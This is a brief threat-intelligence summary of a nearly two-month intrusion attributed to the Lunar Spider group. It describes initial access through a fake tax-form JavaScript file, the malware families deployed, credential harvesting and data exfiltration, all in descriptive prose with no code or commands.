The Reveal Platform
Intel Name: From a single click: how lunar spider enabled a near two-month intrusion
Date of Scan: September 30, 2025
Impact: High
Summary: The intrusion started with a JavaScript file linked to the Lunar Spider group, disguised as a tax form, which downloaded and executed Brute Ratel via an MSI installer. Throughout the attack, various malware strains were deployed, including Latrodectus, Brute Ratel C4, Cobalt Strike, BackConnect, and a custom .NET backdoor. The attackers harvested credentials from multiple sources, such as LSASS, backup tools, browsers, and a Windows Answer file used for automated system setup. Data exfiltration began around 20 days in, using Rclone and FTP. The threat actor remained active for nearly two months, maintaining intermittent C2 connections and carrying out discovery, lateral movement, and further data theft.
